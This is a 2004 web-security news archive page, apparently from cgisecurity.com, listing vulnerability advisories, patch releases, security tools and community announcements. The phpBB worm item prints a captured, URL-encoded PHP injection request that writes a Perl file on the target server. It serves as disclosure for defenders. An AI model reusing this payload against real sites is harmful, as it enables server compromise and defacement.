Hosting generously provided by
|
|
12/28/2004 Secure programmer: Call components safely
|
David Wheeler has published a paper that's worth mentioning.
"Application programs typically make calls to other components, such as the underlying operating system, database systems, reusable libraries, Internet services (like DNS), Web services, and so on. This article explains how to prevent attackers from exploiting those calls to other components by discussing the use of only secure components, passing only valid data, making sure the data will be correctly interpreted, checking return values and exceptions, and protecting data as it flows between applications and components." - David Wheeler
|
|
|
|
12/21/2004 New PHP Worm exploiting sites
|
A new worm is exploiting, and defacing websites running phpbb using a recently discovered vulnerabily.
The worm is sending the following request
x.x.x.x - - [20/Dec/2004:08:41:35 -0800] "GET
/viewtopic.php?p=9002&sid=f5
399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch
r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)
%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252
echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech
r(32)),exit%252e%2527 HTTP/1.0" 200"
This worm is using google to find vulnerable hosts which is rather interesting. On a side note
I wrote a paper roughly two years ago predicting more advanced methods in which a web application worm will spread
that can be found . I'm surprised
it's taking this long...
|
|
|
|
12/21/2004 Article on the recent ASP.NET Flaw
|
While reading I stumbled upon an interesting article
by Mark Burnett about the recent ASP.NET flaw.
|
|
|
|
12/05/2004 Web Application Security Consortium Guest Articles Call For Papers (CFP)
|
The is seeking Guest writers to contribute web security
articles.
"Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field." - WASC
|
|
|
|
12/05/2004 Web Application Security Consortium Guest Articles Call For Papers (CFP)
|
The is seeking Guest writers to contribute web security
articles.
"Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field." - WASC
|
|
|
|
11/21/2004 Server upgrades will result in downtime
|
This machine will be upgraded between November 22nd and 23rd so expect some
downtime. If after Wednesday you experience any issues please email
admin@cgisecurity.com with your concerns.
UPDATE: This machine has been upgraded. If you experience any
issues please email the address above.
|
|
|
|
10/29/2004 Apache 1.3.33 Released!
|
Apache 1.3.33 has been released to address an
in apache's SSI Handler.
|
|
|
|
10/25/2004 Apache 1.3.32 Released!
|
Apache 1.3.22 has been released to address a security issue in .
|
|
|
|
10/25/2004 New MySQL Security Section
|
I finally got around to creating a MySQL Security section for this website. I am still
looking for additional content for this section so please
|
|
|
|
10/12/2004 Windows releases a *bunch* of security advisories
|
Microsoft has released 10 security patches fixing major issues. T-minus 60 days for the next big internet worm!
|
|
|
|
10/9/2004 SANS Released Top 20 List
|
" The SANS Top 20 Internet Security Vulnerabilities
The vast majority of worms and other successful cyber attacks are made possible by vulnerabilities in a small number of common operating system services. Attackers are opportunistic. They take the easiest and most convenient route and exploit the best-known flaws with the most effective and widely available attack tools. They count on organizations not fixing the problems, and they often attack indiscriminately, scanning the Internet for any vulnerable systems. The easy and destructive spread of worms, such as Blaster, Slammer, and Code Red, can be traced directly to exploitation of unpatched vulnerabilities.
Four years ago, the SANS Institute and the National Infrastructure Protection Center (NIPC) at the FBI released a document summarizing the Ten Most Critical Internet Security Vulnerabilities. Thousands of organizations used that list, and the expanded Top-20 lists that followed one, two, and three years later, to prioritize their efforts so they could close the most dangerous holes first. The vulnerable services that led to worms like Blaster, Slammer, and Code Red, as well as NIMDA worms - are on that list.
This SANS Top-20 2004 is actually two Top Ten lists: the ten most commonly exploited vulnerable services in Windows and the ten most commonly exploited vulnerable services in UNIX and Linux. Although there are thousands of security incidents each year affecting these operating systems, the overwhelming majority of successful attacks target one or more of these twenty vulnerable services.
The Top-20 is a consensus list of vulnerabilities that require immediate remediation. It is the result of a process that brought together dozens of leading security experts. They come from the most security-conscious government agencies in the UK, US, and Singapore; the leading security software vendors and consulting firms; the top university-based security programs; many other user organizations; and the SANS Institute." - SANS
|
|
|
|
09/15/2004 Apache2.0.51 released to address multiple security issues
|
"The Apache Software Foundation and the The Apache HTTP Server Project
are pleased to announce the release of version 2.0.51 of the Apache
HTTP Server ("Apache"). This Announcement notes the significant
changes in 2.0.51 as compared to 2.0.50.
This version of Apache is principally a bug fix release. Of
particular note is that 2.0.51 addresses five security
vulnerabilities:"
" An input validation issue in IPv6 literal address parsing which
can result in a negative length parameter being passed to memcpy.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0786]
A buffer overflow in configuration file parsing could allow a
local user to gain the privileges of a httpd child if the server
can be forced to parse a carefully crafted .htaccess file.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0747]
A segfault in mod_ssl which can be triggered by a malicious
remote server, if proxying to SSL servers has been configured.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0751]
A potential infinite loop in mod_ssl which could be triggered
given particular timing of a connection abort.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0748]
A segfault in mod_dav_fs which can be remotely triggered by an
indirect lock refresh request.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0809]" - Apache
|
|
|
|
09/01/2004 Even more Oracle Vulnerabilities!
|
has discovered 44 buffer overflows in Oracle.
"Multiple buffer overflow and denial of service (DoS) vulnerabilities
exist in the Oracle Database Server which allow database users to take
complete control over the database and optionally cause denial of service.
The official advisory from Oracle Corporation can be obtained from:
" - Appsecinc
|
|
|
|
09/01/2004 Vulnerabilities discovered in IBM's DB2 Universal Database
|
"Researchers at have discovered multiple critical/high risk
vulnerabilities in IBM's DB2 Universal Database. Versions affected include
DB2 8.1 Fixpak 6 and earlier
DB2 7.x Fixpak 11 and earlier
Two of the issues, remotely exploitable buffer overflows, have been fixed in
Fixpak 7 for DB2 8.1 and Fixpak 12 for DB2 7.x. These Fixpaks were released
last week and they can be downloaded from
" - ngsec
|
|
|
|
09/01/2004 Multiple Oracle Vulnerabilities discovered
|
"Researchers at have discovered multiple critical vulnerabilities
in Oracle Database Server and Oracle Application Server. Versions affected
include
Oracle Database 10g Release 1 Version 10.1.0.2
Oracle9i Database Server Release 2, versions 9.2.0.4 and 9.2.0.5
Oracle9i Database Server Release 1, versions 9.0.1.4, 9.0.1.5 and 9.0.4
Oracle8i Database Server Release 3, version 8.1.7.4
Oracle Application Server 10g (9.0.4), versions 9.0.4.0 and 9.0.4.1
Oracle9i Application Server Release 2, versions 9.0.2.3 and 9.0.3.1
Oracle9i Application Server Release 1, version 1.0.2.2" - ngsec
|
|
|
|
09/01/2004 Book Review: Hardening Apache
|
I was reading slashdot today and came across of
"Hardening Apache fills a huge gap in this sense, providing web administrators with a
complete and yet concise book aimed to guide them from the very beginning of the installation
process to the final steps of the server configuration. The author, Tony Mobily, is also the mind
behind Professional Apache Security, a book published by Wrox Press which I reviewed on Slashdot
about 17 months ago. Since Wrox's unfortunate closure, some of the material from that book has been
moved into Hardening Apache."
|
|
|
|
08/30/2004 Website Updates
|
I've added a bunch of papers to be sure to check them out!
|
|
|
|
08/29/2004 Paros v3.1.3 Released
|
"Paros is a man-in-the-middle proxy and application vulnerability scanner. It allows users
to intercept, modify and debug HTTP and HTTPS data on-the-fly between web server and client
browser. It also supports client-certificate, proxy-chaining, filtering and various vulnerability
scanning." - Paros
[New features]
"
- Allow to run the scanner on a paticular request shown in the lower URL list (select the request on the URL list, right-click and choose 'Scan Selected Node/Item')
- Allow to re-send a paticular request shown in the lower URL list (select the request on the URL list, right-click and choose 'Re-send'). Check the correctness of the information such as the port before sending it out.
- Allow to craft a request by clicking the menu "Tools" => "Send HTTP(S) Requests"
- In the filter DetectUnsafeContent, add new IE vulnerability check, and improve ms-its checks and speed of other checks ."
|
|
|
|
07/27/04 Web Application Security Consortium (WASC) releases 'Threat Classifications' document
|
has released a web security 'Threat Classifications'
document that attempts to help clarify some of the terms used in web security (such as xss, session fixation, insufficient authorization, etc...).
Additional information can be found at the link below.
|
|
|
|
07/13/04 PHP 4.3.8 released to address security issues
|
PHP 4.3.8 and 5.0.0RC3 were released today to address a security
. Users running older versions are urged to upgrade (bla bla bla).
|
|
|
|
07/13/04 IIS 4.0 Buffer overflow discovered and other microsoft patches
|
Microsoft has released today. One of
the vulnerabilities disclosed was a .
|
|
|
|
06/30/04 Apache 2.0.50 Released to address security issues
|
"This version of Apache is principally a bug fix release. A summary of
the bug fixes is given at the end of this document. Of particular
note is that 2.0.50 addresses two security vulnerabilities:
A remotely triggered memory leak in http header parsing can allow a
denial of service attack due to excessive memory consumption.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493]
Fixes a mod_ssl buffer overflow in the FakeBasicAuth code for a
(trusted) client certificate subject DN which exceeds 6K in length.
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488]" - apache.org
|
|
|
|
06/29/04 "Secure Apache 2 : Step by step"
|
I found this interesting article on securityfocus about securing apache 2. Definitely worth the read if you're
considering switching from the 1.3 branch.
|
|
|
|
06/15/04 Mod_security v1.8 released
|
"Mod_security is an Apache module whose purpose is to protect
vulnerable applications and reject human or automated attacks.
It is an open source intrusion detection and prevention system
for Apache. In addition to request filtering, it also creates Web
application audit logs. Requests are filtered using regular
expressions. Some of the things possible are:
* Apply filters against any part of the request (URI,
headers, either GET or POST)
* Apply filters against individual parameters
* Reject SQL injection attacks
* Reject Cross site scripting attacks
With few general rules mod_security can protect from both
known and unknown vulnerabilities." - mod_security
Download:
|
|
|
|
05/19/2004 Blind XPath XML injection paper released
|
"This paper describes a Blind XPath Injection attack that enables an
attacker to extract a complete XML document used for XPath querying -
without prior knowledge of the XPath query. The attack is "complete"
since all possible data is exposed. The attack makes use of two
techniques XPath crawling, and Booleanization of XPath queries.
Using this attack, it is possible to get hold of the XML "database"
used in the XPath query. This can be most powerful against sites that
use XPath queries (and XML "databases") for authentication,
searching, and other uses.
Compared to the SQL injection attacks, XPath Injection has the
following upsides:
(*) Since XPath is a standard (yet rich) language, it is possible to
carry the attack 'as-is' for any XPath implementation. This is in
contrast to SQL injection where different implementations have
different SQL dialects (there is acommon SQL language, but it is
often too weak).
(*) The XPath language can reference practically all parts of the XML
document without access control restrictions, whereas with SQL, a
"user" (which is a term undefined in the XPath/XML context) may be
restricted to certain tables, columns or queries. So the outcome of
the Blind XPath Injection attack is guaranteed to consist of the
complete XML document, i.e. the complete database.
These results enable an automated attack to fit any XPath based
application provided that it possesses the basic security hole.
Indeed, such pr oof of concept script was written and demonstrated
on various XPath implementations." - Sanctum
|
|
|
|
05/11/2004 Apache 1.3.31 Released!
|
has released 1.3.31 as the latest release primarly to fix 4 security issues.
"Apache 1.3.31 Major changes
Security vulnerabilities
* CAN-2003-0987 (cve.mitre.org)
In mod_digest, verify whether the nonce returned in the client
response is one we issued ourselves. This problem does not affect
mod_auth_digest.
* CAN-2003-0020 (cve.mitre.org)
Escape arbitrary data before writing into the errorlog.
* CAN-2004-0174 (cve.mitre.org)
Fix starvation issue on listening sockets where a short-lived
connection on a rarely-accessed listening socket will cause a
child to hold the accept mutex and block out new connections until
another connection arrives on that rarely-accessed listening socket.
* CAN-2003-0993 (cve.mitre.org)
Fix parsing of Allow/Deny rules using IP addresses without a
netmask; issue is only known to affect big-endian 64-bit
platforms" - apache
The
|
|
|
|
05/11/2004 Tools on portswigger.net
|
I recently came across which has a great collection
of free tools (written in Java) for use during web application security auditing. Below are some highlights
* Burp Spider
"Burp spider is a tool for enumerating web-enabled applications. It uses various intelligent techniques to generate a comprehensive inventory of an application's content and functionality.
Burp spider enables the user to obtain a detailed understanding of how a web application works, avoiding the time-consuming and unreliable task of manually following links, submitting forms and scouring HTML source code. Potentially vulnerable application functions can be quickly identified, allowing the user to check for specific vulnerabilities such as SQL injection and directory traversal." - portswigger.net
* Burp proxy
"Burp proxy is an interactive HTTP/S proxy server for attacking and debugging web-enabled applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.
Burp proxy allows an attacker to find and exploit application vulnerabilities by monitoring and manipulating critical parameters and other data transmitted by the application. By modifying browser requests in various malicious ways, burp proxy can be used to perform attacks such as SQL injection, cookie subversion, privilege escalation, session hijacking, directory traversal and buffer overflows." - portswigger.net
* Burp Sock
"Sock is a simple tool for manually attacking web-enabled applications. It allows a single HTTP request to be manipulated and re-issued repeatedly from the same window. Each response can be viewed as plain text or rendered as a web page, and can be searched for keywords. Sock supports SSL, and keeps a history of all requests and responses.
Sock provides a convenient graphical context in which to execute the kind of manual application testing that can be performed from a command line using tools such as netcat and stunnel. In addition, sock automatically handles various encodings of server responses, including chunked transfer-encoding and compressed content-encoding." - portswigger
|
|
|
|
05/10/2004 Website Updates
|
The following sections of this website have been updated. Expect many more updates throughout the week.
|
|
|
|
05/10/2004 Site updates
|
You may be wondering why I haven't updated this site in awhile. Mostly because I've been busy with work/life/Other. One thing
I have been spending a lot of time on is the which will
be releasing which is a rather large document due out soon. This website will start to pick up a bit with
very regular updates. Stay tuned!
|
|
|
|
05/10/2004 Tomcat 5.0.24 Stable Released
|
5.0.24 Stable has been released.
That is all...
|
|
|
|
2/23/04 Web Application Security Consortium group formed
|
A new web security group called The Web Application Security Consortium announced itself today. This group
will release documents, and form projects to help address some of the issues in web security. The first release
by this group is the "Web Security Glossary", a index of all common terminology involving web application
security.
" The Web Security Glossary is an alphabetical index of terms and terminology relating to web applications security. The purpose of the Glossary is to further clarify the language used within the community." - WASC
|
|
|
|
2/22/04 Free Web Services Security Tool
|
I found a free tool by Vordel that is very useful for people who plan on auditing their web services
for security vulnerabilities called "Vordel SOAPbox" (Registration required).
|
|
|
|
2/20/04 New Approach to .NET obfuscation
|
I found an interesting article on slashdot talking about a new technology that will further lockdown
.NET applications. From this initial article this looks like a promising new technology.
"One area of research is called "Program State Code Protection,” or PSCP, which means changing the code AS IT RUNS to make it harder for a cracker to know what is actually happening. Dotfuscator and DashO, for example, right now change all variable names to the same name. But what if all variable names were changed not just to the same name, but were changed continuously to a wide variety of names? The first technique -– making all the variable names the same -– is like building a jigsaw puzzle entirely of white pieces. But PSCP is like making a jigsaw puzzle of all white pieces that spontaneously and continuously appear to change size and shape."
|
|
|
Information contained on this website may not be copied without explicit permission.
Best Viewed with Netscape.
|
|
|
Subscribe to CGISecurity.com
|
|
|
|
|
|
The Web Security Mailing List
|
|
|
|
|
Contact us
|
Post News, get linkage!
|
|
|
|
